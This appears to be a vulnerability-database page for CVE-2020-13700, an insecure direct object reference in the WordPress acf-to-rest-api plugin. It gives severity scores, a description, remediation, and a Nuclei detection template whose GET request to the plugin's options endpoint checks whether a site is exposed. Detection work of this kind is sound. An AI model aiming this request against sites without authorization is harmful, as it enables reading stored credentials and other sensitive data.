Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-13700
HistoryMar 10, 2021 - 4:14 a.m.

WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference

2021-03-1004:14:33
ProjectDiscovery
github.com
15
cve
cve2020
wordpress
acf_to_rest_api_project
plugin

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.018

Percentile

88.3%

WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
id: CVE-2020-13700

info:
  name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
  author: pikpikcu
  severity: high
  description: |
    WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
  impact: |
    An attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
  remediation: |
    Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
  reference:
    - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
    - https://wordpress.org/plugins/acf-to-rest-api/#developers
    - https://github.com/airesvsg/acf-to-rest-api
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13700
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13700
    cwe-id: CWE-639
    epss-score: 0.01831
    epss-percentile: 0.88233
    cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acf_to_rest_api_project
    product: acf_to_rest_api
    framework: wordpress
  tags: cve,cve2020,wordpress,plugin,acf_to_rest_api_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Content-Type: application/json'

      - type: word
        part: body
        words:
          - 'acf-to-rest-api\/class-acf-to-rest-api.php'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aec7e7c4fcb60c57ef25e6cc1ae2372d27bb9b95b632e0fb4e3c7c0c9feb7766022015ad75e81bbe30e6cf1acedf96073238c86309f593297993c44d0d7f7b49189b:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.018

Percentile

88.3%